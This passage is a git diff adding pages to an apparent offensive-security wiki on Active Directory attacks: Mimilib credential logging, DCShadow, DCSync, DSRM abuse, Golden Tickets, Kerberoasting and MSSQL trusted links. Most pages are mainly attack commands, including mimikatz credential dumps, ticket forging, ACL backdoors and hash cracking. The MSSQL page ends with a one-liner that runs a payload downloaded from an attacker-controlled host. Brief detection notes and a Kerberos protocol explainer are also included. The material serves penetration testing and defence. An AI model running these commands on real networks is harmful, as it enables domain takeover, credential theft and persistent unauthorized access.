+
+#### Mimilib
+
+You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**  
+Drop the dll in ****`C:\Windows\System32\`  
+Get a list existing LSA Security Packages:
+
+{% code title="attacker@target" %}
+```bash
+PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
+
+HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
+    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
+```
+{% endcode %}
+
+Add `mimilib.dll` to the Security Support Provider list \(Security Packages\):
+
+```csharp
+PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
+```
+
+And after a reboot all credentials can be found in clear text in `C:\Windows\System32\kiwissp.log`
+
+#### In memory
+
+You can also inject this in memory directly using Mimikatz \(notice that it could be a little bit unstable/not working\):
+
+```csharp
+privilege::debug
+misc::memssp
+```
+
+This won't survive reboots.
+
+### Mitigation
+
+Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
+
diff --git a/windows/active-directory-methodology/dcshadow.md b/windows/active-directory-methodology/dcshadow.md
new file mode 100644
index 00000000..492dea8f
--- /dev/null
+++ b/windows/active-directory-methodology/dcshadow.md
@@ -0,0 +1,85 @@
+# DCShadow
+
+## DCShadow
+
+It registers a **new Domain Controller** in the AD and uses it to **push attributes** \(SIDHistory, SPNs...\) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.  
+Note that if you use wrong data, pretty ugly logs will appear.
+
+To perform the attack you need 2 mimikatz instances. One of them will start the RPC servers with SYSTEM privileges \(you have to indicate here the changes you want to perform\), and the other instance will be used to push the values:
+
+{% code title="mimikatz1 \(RPC servers\)" %}
+```bash
+!+
+!processtoken
+lsadump::dcshadow /object:username /attribute:Description /value="My new description"
+```
+{% endcode %}
+
+{% code title="mimikatz2 \(push\) - Needs DA or similar" %}
+```bash
+lsadump::dcshadow /push
+```
+{% endcode %}
+
+Notice that **`elevate::token`** won't work in mimikatz1 session as that elevated the privileges of the thread, but we need to elevate the **privilege of the process**.  
+You can also select and "LDAP" object: `/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local`
+
+You can push the changes from a DA or from a user with this minimal permissions:
+
+* In the **domain object**:
+  * _DS-Install-Replica_ \(Add/Remove Replica in Domain\)
+  * _DS-Replication-Manage-Topology_ \(Manage Replication Topology\)
+  * _DS-Replication-Synchronize_ \(Replication Synchornization\)
+* The **Sites object** \(and its children\) in the **Configuration container**: 
+  * _CreateChild and DeleteChild_
+* The object of the **computer which is registered as a DC**:
+  * _WriteProperty_ \(Not Write\)
+* The **target object**:
+  * _WriteProperty_ \(Not Write\)
+
+You can use ****[**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) to give these privileges to an unprivileged user \(notice that this will leave some logs\). This is much more restrictive than having DA privileges.  
+For example: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose`  This means that the username _**student1**_ when logged on in the machine _**mcorp-student1**_ has DCShadow permissions over the object _**root1user**_.
+
+### Using DCShadow to create backdoors
+
+{% code title="Set Enterprise Admins in SIDHistory to a user" %}
+```bash
+lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519 
+```
+{% endcode %}
+
+{% code title="Chage PrimaryGroupID \(put user as member of Domain Administrators\)" %}
+```bash
+lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
+```
+{% endcode %}
+
+{% code title="Modify ntSecurityDescriptor of AdminSDHolder \(give Full Control to a user\)" %}
+```bash
+#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
+(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
+#Second, add to the ACE permissions to your user and push it using DCShadow
+lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>
+```
+{% endcode %}
+
+### Shadowception - Give DCShadow permissions using DCShadow \(no modified permissions logs\)
+
+We need to append following ACEs with our user's SID at the end:
+
+* On the domain object:
+  * `(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
+  * `(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)`
+  * `(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
+* On the attacker computer object: `(A;;WP;;;UserSID)`
+* On the target user object: `(A;;WP;;;UserSID)`
+* On the Sites object in Configuration container: `(A;CI;CCDC;;;UserSID)`
+
+To get the current ACE of an object: `(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl`
+
+Notice that in this case you need to make **several changes,** not just one. So, in the **mimikatz1 session** \(RPC server\) use the parameter **`/stack` with each change** you want to make. This way, you will only need to **`/push`** one time to perform all the stucked changes in the rouge server.
+
+
+
+\*\*\*\*[**More information about DCShadow in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/dcsync.md b/windows/active-directory-methodology/dcsync.md
new file mode 100644
index 00000000..3c13169c
--- /dev/null
+++ b/windows/active-directory-methodology/dcsync.md
@@ -0,0 +1,49 @@
+# DCSync
+
+## DCSync
+
+The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.
+
+**Important Notes about DCSync:**
+
+* The **DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information** using the Directory Replication Service Remote Protocol \(MS-DRSR\). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
+* By default only **Domain Admins, Enterprise Admins, Administrators, and Domain Controllers** groups have the required privileges.
+* If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text
+
+### Enumeration
+
+Check who has these permissions using `powerview`:
+
+```bash
+Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
+```
+
+### Exploit
+
+```bash
+Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
+```
+
+### Persistence
+
+If you are a domain admin, you can grant this permissions to any user with the help of `powerview`:
+
+```bash
+Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
+```
+
+Then, you can **check if the user was correctly assigned** the 3 privileges looking for them in the output of \(you should be able to see the names of the privileges inside the "ObjectType" field\):
+
+```bash
+Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
+```
+
+### Mitigation
+
+* Security Event ID 4662 \(Audit Policy for object must be enabled\) – An operation was performed on an object
+* Security Event ID 5136 \(Audit Policy for object must be enabled\) – A directory service object was modified
+* Security Event ID 4670 \(Audit Policy for object must be enabled\) – Permissions on an object were changed
+* AD ACL Scanner - Create and compare create reports of ACLs. [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
+
+\*\*\*\*[**More information about DCSync in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/dsrm-credentials.md b/windows/active-directory-methodology/dsrm-credentials.md
new file mode 100644
index 00000000..08b84a2f
--- /dev/null
+++ b/windows/active-directory-methodology/dsrm-credentials.md
@@ -0,0 +1,33 @@
+# DSRM Credentials
+
+## DSRM Credentials
+
+There is a **local administrator** account inside each **DC**. Having admin privileges in this machine you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.  
+First we need to **dump** the **hash** of the **local Administrator** user inside the DC:
+
+```bash
+Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
+```
+
+Then we need to check if that account will work, and if the registry key has the value "0" or it doesn't exist you need to **set it to "2"**:
+
+```bash
+Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
+New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
+Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"
+```
+
+Then, using a PTH you can **list the content of C$ or even obtain a shell**. Notice that for creating a new powershell session with that hash in memory \(for the PTH\) **the "domain" used is just the name of the DC machine:**
+
+```bash
+sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
+#And in new spawned powershell you now can access via NTLM the content of C$
+ls \\dc-host-name\C$
+```
+
+More info about this in: [https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) and [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)
+
+### Mitigation
+
+* Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`
+
diff --git a/windows/active-directory-methodology/golden-ticket.md b/windows/active-directory-methodology/golden-ticket.md
new file mode 100644
index 00000000..a154074a
--- /dev/null
+++ b/windows/active-directory-methodology/golden-ticket.md
@@ -0,0 +1,36 @@
+# Golden Ticket
+
+## Golden ticket
+
+A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** \(or machine\) in the domain and the impersonated user.
+
+The **krbtgt** account **NTLM hash** can be **obtained** from the **lsass process** or from the **NTDS.dit file** of any DC in the domain. It is also possible to get that NTLM through a **DCsync attack**, which can be performed either with the [lsadump::dcsync](https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump) module of Mimikatz or the impacket example [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py). Usually, **domain admin privileges or similar are required**, no matter what technique is used.
+
+{% code title="From Linux" %}
+```bash
+python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
+export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
+python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
+```
+{% endcode %}
+
+{% code title="From Windows" %}
+```bash
+mimikatz # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
+.\Rubeus.exe ptt /ticket:ticket.kirbi
+klist #List tickets in memory
+```
+{% endcode %}
+
+**Once** you have the **golden Ticket injected**, you can access the shared files **\(C$\)**, and execute services and WMI, so you could use **psexec** or **wmiexec** to obtain a shell \(looks like yo can not get a shell via winrm\).
+
+### Mitigation
+
+Golden ticket events ID:
+
+* 4624: Account Logon
+* 4672: Admin Logon
+* `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property`
+
+\*\*\*\*[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/kerberoast.md b/windows/active-directory-methodology/kerberoast.md
new file mode 100644
index 00000000..9e771990
--- /dev/null
+++ b/windows/active-directory-methodology/kerberoast.md
@@ -0,0 +1,83 @@
+# Kerberoast
+
+## Kerberoast
+
+The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.  
+You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
+
+Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.
+
+**You need valid credentials inside the domain.**
+
+{% code title="From linux" %}
+```bash
+msf> use auxiliary/gather/get_user_spns
+GetUserSPNs.py -request -dc-ip 192.168.2.160 <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
+GetUserSPNs.py -request -dc-ip 192.168.2.160 -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
+```
+{% endcode %}
+
+{% code title="From Windows, from memory to disk" %}
+```bash
+Get-NetUser -SPN | select serviceprincipalname #PowerView, get user service accounts
+
+#Get TGS in memory
+Add-Type -AssemblyName System.IdentityModel 
+New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local 
+ 
+klist #List kerberos tickets in memory
+ 
+Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder
+```
+{% endcode %}
+
+{% code title="From Windows" %}
+```bash
+Request-SPNTicket -SPN "<SPN>" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
+.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
+iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
+Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
+```
+{% endcode %}
+
+### Cracking
+
+```text
+john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
+hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
+./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
+```
+
+### Persistence
+
+If you have **enough permissions** over a user you can **make it kerberoastable**:
+
+```bash
+ Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
+```
+
+You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
+
+If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate <IP of DC>`
+
+### Mitigation
+
+Kerberoast is very stealthy if exploitable
+
+* Security Event ID 4769 – A Kerberos ticket was requested
+* Since 4769 is very frequent, lets filter the results:
+  * Service name should not be krbtgt
+  * Service name does not end with $ \(to filter out machine accounts used for services\)
+  * Account name should not be machine@domain \(to filter out requests from machines\)
+  * Failure code is '0x0' \(to filter out failures, 0x0 is success\)
+  * Most importantly, ticket encryption type is 0x17
+* Mitigation:
+  * Service Account Passwords should be hard to guess \(greater than 25 characters\)
+  * Use Managed Service Accounts \(Automatic change of password periodically and delegated SPN Management\)
+
+```bash
+Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
+```
+
+**More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.**
+
diff --git a/windows/active-directory-methodology/kerberos-authentication.md b/windows/active-directory-methodology/kerberos-authentication.md
new file mode 100644
index 00000000..53afb2ed
--- /dev/null
+++ b/windows/active-directory-methodology/kerberos-authentication.md
@@ -0,0 +1,198 @@
+# Kerberos Authentication
+
+**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)\*\*\*\*
+
+## Kerberos \(I\): How does Kerberos work? – Theory
+
+20 - MAR - 2019 - ELOY PÉREZ
+
+The objective of this series of posts is to clarify how Kerberos works, more than just introduce the attacks. This due to the fact that in many occasions it is not clear why some techniques works or not. Having this knowledge allows to know when to use any of those attacks in a pentest.
+
+Therefore, after a long journey of diving into the documentation and several posts about the topic, we’ve tried to write in this post all the important details which an auditor should know in order to understand how take advantage of Kerberos protocol.
+
+In this first post only basic functionality will be discussed. In later posts it will see how perform the attacks and how the more complex aspects works, as delegation.
+
+If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic.
+
+### What is Kerberos?
+
+Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.
+
+Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources.
+
+### Kerberos items
+
+In this section several components of Kerberos environment will be studied.
+
+**Transport layer**
+
+Kerberos uses either UDP or TCP as transport protocol, which sends data in cleartext. Due to this Kerberos is responsible for providing encryption.
+
+Ports used by Kerberos are UDP/88 and TCP/88, which should be listen in KDC \(explained in next section\).
+
+**Agents**
+
+Several agents work together to provide authentication in Kerberos. These are the following:
+
+* **Client or user** who wants to access to the service.
+* **AP** \(Application Server\) which offers the service required by the user.
+* **KDC** \(Key Distribution Center\), the main service of Kerberos, responsible of issuing the tickets, installed on the DC \(Domain Controller\). It is supported by the **AS** \(Authentication Service\), which issues the TGTs.
+
+**Encryption keys**
+
+There are several structures handled by Kerberos, as tickets. Many of those structures are encrypted or signed in order to prevent being tampered by third parties. These keys are the following:
+
+* **KDC or krbtgt key** which is derivate from krbtgt account NTLM hash.
+* **User key** which is derivate from user NTLM hash.
+* **Service key** which is derivate from the NTLM hash of service owner, which can be an user or computer account.
+* **Session key** which is negotiated between the user and KDC.
+* **Service session key** to be use between user and service.
+
+**Tickets**
+
+The main structures handled by Kerberos are the tickets. These tickets are delivered to the users in order to be used by them to perform several actions in the Kerberos realm. There are 2 types:
+
+* The **TGS** \(Ticket Granting Service\) is the ticket which user can use to authenticate against a service. It is encrypted with the service key.
+* The **TGT** \(Ticket Granting Ticket\) is the ticket presented to the KDC to request for TGSs. It is encrypted with the KDC key.
+
+**PAC**
+
+The **PAC** \(Privilege Attribute Certificate\) is an structure included in almost every ticket. This structure contains the privileges of the user and it is signed with the KDC key.
+
+It is possible to services to verify the PAC by comunicating with the KDC, although this does not happens often. Nevertheless, the PAC verification consists of checking only its signature, without inspecting if privileges inside of PAC are correct.
+
+Furthermore, a client can avoid the inclusion of the PAC inside the ticket by specifying it in _KERB-PA-PAC-REQUEST_ field of ticket request.
+
+**Messages**
+
+Kerberos uses differents kinds of messages. The most interesting are the following:
+
+* **KRB\_AS\_REQ**: Used to request the TGT to KDC.
+* **KRB\_AS\_REP**: Used to deliver the TGT by KDC.
+* **KRB\_TGS\_REQ**: Used to request the TGS to KDC, using the TGT.
+* **KRB\_TGS\_REP**: Used to deliver the TGS by KDC.
+* **KRB\_AP\_REQ**: Used to authenticate a user against a service, using the TGS.
+* **KRB\_AP\_REP**: \(Optional\) Used by service to identify itself against the user.
+* **KRB\_ERROR**: Message to comunicate error conditions.
+
+Additionally, even if it is not part of Kerberos, but NRPC, the AP optionally could use the **KERB\_VERIFY\_PAC\_REQUEST** message to send to KDC the signature of PAC, and verify if it is correct.
+
+Below is shown a summary of message sequency to perform authentication
+
+![Kerberos messages summary](../../.gitbook/assets/image%20%2844%29.png)
+
+### Authentication process
+
+In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service.
+
+**KRB\_AS\_REQ**
+
+Firstly, user must get a TGT from KDC. To achieve this, a KRB\_AS\_REQ must be sent:
+
+![KRB\_AS\_REQ schema message](../../.gitbook/assets/image%20%2894%29.png)
+
+_KRB\_AS\_REQ_ has, among others, the following fields:
+
+* A encrypted **timestamp** with client key, to authenticate user and prevent replay attacks
+* **Username** of authenticated user
+* The service **SPN** asociated with **krbtgt** account
+* A **Nonce** generated by the user
+
+Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) __flag is set in user account.
+
+**KRB\_AS\_REP**
+
+After receiving the request, the KDC verifies the user identity by decrypting the timestamp. If the message is correct, then it must respond with a _KRB\_AS\_REP_:
+
+![KRB\_AS\_REP schema message](../../.gitbook/assets/image%20%28212%29.png)
+
+_KRB\_AS\_REP_ includes the next information:
+
+* **Username**
+* **TGT**, which includes:
+  * **Username**
+  * **Session key**
+  * **Expiration date** of TGT
+  * **PAC** with user privileges, signed by KDC
+* Some **encrypted data** with user key, which includes:
+  * **Session key**
+  * **Expiration date** of TGT
+  * User **nonce**, to prevent replay attacks
+
+Once finished, user already has the TGT, which can be used to request TGSs, and afterwards access to the services.
+
+**KRB\_TGS\_REQ**
+
+In order to request a TGS, a _KRB\_TGS\_REQ_ message must be sent to KDC:
+
+![KRB\_TGS\_REQ schema message](../../.gitbook/assets/image%20%2858%29.png)
+
+_KRB\_TGS\_REQ_ includes:
+
+* **Encrypted data** with session key:
+  * **Username**
+  * **Timestamp**
+* **TGT**
+* **SPN** of requested service
+* **Nonce** generated by user
+
+**KRB\_TGS\_REP**
+
+After receiving the _KRB\_TGS\_REQ_ message, the KDC returns a TGS inside of _KRB\_TGS\_REP_:
+
+![KRB\_TGS\_REP schema message](../../.gitbook/assets/image%20%2842%29.png)
+
+_KRB\_TGS\_REP_ includes:
+
+* **Username**
+* **TGS**, which contains:
+  * **Service session key**
+  * **Username**
+  * **Expiration date** of TGS
+  * **PAC** with user privileges, signed by KDC
+* **Encrypted data** with session key:
+  * **Service session key**
+  * **Expiration date** of TGS
+  * User **nonce**, to prevent replay attacks
+
+**KRB\_AP\_REQ**
+
+To finish, if everything went well, the user already has a valid TGS to interact with service. In order to use it, user must send to the AP a _KRB\_AP\_REQ_ message:
+
+![KRB\_AP\_REQ schema message](../../.gitbook/assets/image%20%28231%29.png)
+
+_KRB\_AP\_REQ_ includes:
+
+* **TGS**
+* **Encrypted data** with service session key:
+  * **Username**
+  * **Timestamp**, to avoid replay attacks
+
+After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message.
+
+### References
+
+* Kerberos v5 RFC: [https://tools.ietf.org/html/rfc4120](https://tools.ietf.org/html/rfc4120)
+* \[MS-KILE\] – Kerberos extension: [https://msdn.microsoft.com/en-us/library/cc233855.aspx](https://msdn.microsoft.com/en-us/library/cc233855.aspx)
+* \[MS-APDS\] – Authentication Protocol Domain Support: [https://msdn.microsoft.com/en-us/library/cc223948.aspx](https://msdn.microsoft.com/en-us/library/cc223948.aspx)
+* Mimikatz and Active Directory Kerberos Attacks: [https://adsecurity.org/?p=556](https://adsecurity.org/?p=556)
+* Explain like I’m 5: Kerberos: [https://www.roguelynn.com/words/explain-like-im-5-kerberos/](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
+* Kerberos & KRBTGT: [https://adsecurity.org/?p=483](https://adsecurity.org/?p=483)
+* Mastering Windows Network Forensics and Investigation, 2 Edition .  Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex.
+* Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. Lowe-Norris
+* Service Principal Names: [https://msdn.microsoft.com/en-us/library/ms677949\(v=vs.85\).aspx](https://msdn.microsoft.com/en-us/library/ms677949%28v=vs.85%29.aspx)
+* Niveles funcionales de Active Directory: [https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0](https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0)
+* OverPass The Hash – Gentilkiwi Blog: [https://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash](https://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash)
+* Pass The Ticket – Gentilkiwi Blog: [https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos](https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos)
+* Golden Ticket – Gentilkiwi Blog: [https://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos](https://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos)
+* Mimikatz Golden Ticket Walkthrough: [https://www.beneaththewaves.net/Projects/Mimikatz\_20\_-\_Golden\_Ticket\_Walkthrough.html](https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html)
+* Attacking Kerberos: Kicking the Guard Dog of Hades: [https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin\(1\).pdf](https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin%281%29.pdf)
+* Kerberoasting – Part 1: [https://room362.com/post/2016/kerberoast-pt1/](https://room362.com/post/2016/kerberoast-pt1/)
+* Kerberoasting – Part 2: [https://room362.com/post/2016/kerberoast-pt2/](https://room362.com/post/2016/kerberoast-pt2/)
+* Roasting AS-REPs: [https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
+* PAC Validation: [https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html](https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html)
+* Understanding PAC Validation: [https://blogs.msdn.microsoft.com/openspecification/2009/04/24/understanding-microsoft-kerberos-pac-validation/](https://blogs.msdn.microsoft.com/openspecification/2009/04/24/understanding-microsoft-kerberos-pac-validation/)
+* Reset the krbtgt acoount password/keys: [https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51](https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51)
+* Mitigating Pass-the-Hash \(PtH\) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036)
+* Fun with LDAP, Kerberos \(and MSRPC\) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58)
+
diff --git a/windows/active-directory-methodology/mssql-trusted-links.md b/windows/active-directory-methodology/mssql-trusted-links.md
new file mode 100644
index 00000000..c16929d0
--- /dev/null
+++ b/windows/active-directory-methodology/mssql-trusted-links.md
@@ -0,0 +1,111 @@
+# MSSQL Trusted Links
+
+## MSSQL Trusted Links
+
+If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host \(if running as SA\).   
+Also, if a MSSQL instance is trusted \(database link\) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
+
+**The links between databases work even across forest trusts.**
+
+### **Powershell**
+
+```bash
+Import-Module .\PowerupSQL.psd1
+
+#Get local MSSQL instance (if any)
+Get-SQLInstanceLocal
+Get-SQLInstanceLocal | Get-SQLServerInfo
+
+#If you don't have a AD account, you can try to find MSSQL scanning via UDP
+#First, you will need a list of hosts to scan
+Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10
+
+#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
+#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
+Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
+
+## FROM INSIDE OF THE DOMAIN
+#Get info about valid MSQL instances running in domain
+#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
+Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose 
+
+#Test connections with each one
+Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
+
+#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
+Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
+
+#Dump an instance (a lotof CVSs generated in current dir)
+Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
+
+#Look for MSSQL links of an accessible instance
+Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
+
+#Crawl trusted links, starting form the given one (the user being used by the MSSQL instance is also specified)
+Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
+
+#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
+Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
+
+#Obtain a shell
+Get-SQLServerLinkCrawl -Instance dcorp-mssql  -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
+
+#Check for possible vulnerabilities on an instance where you have access
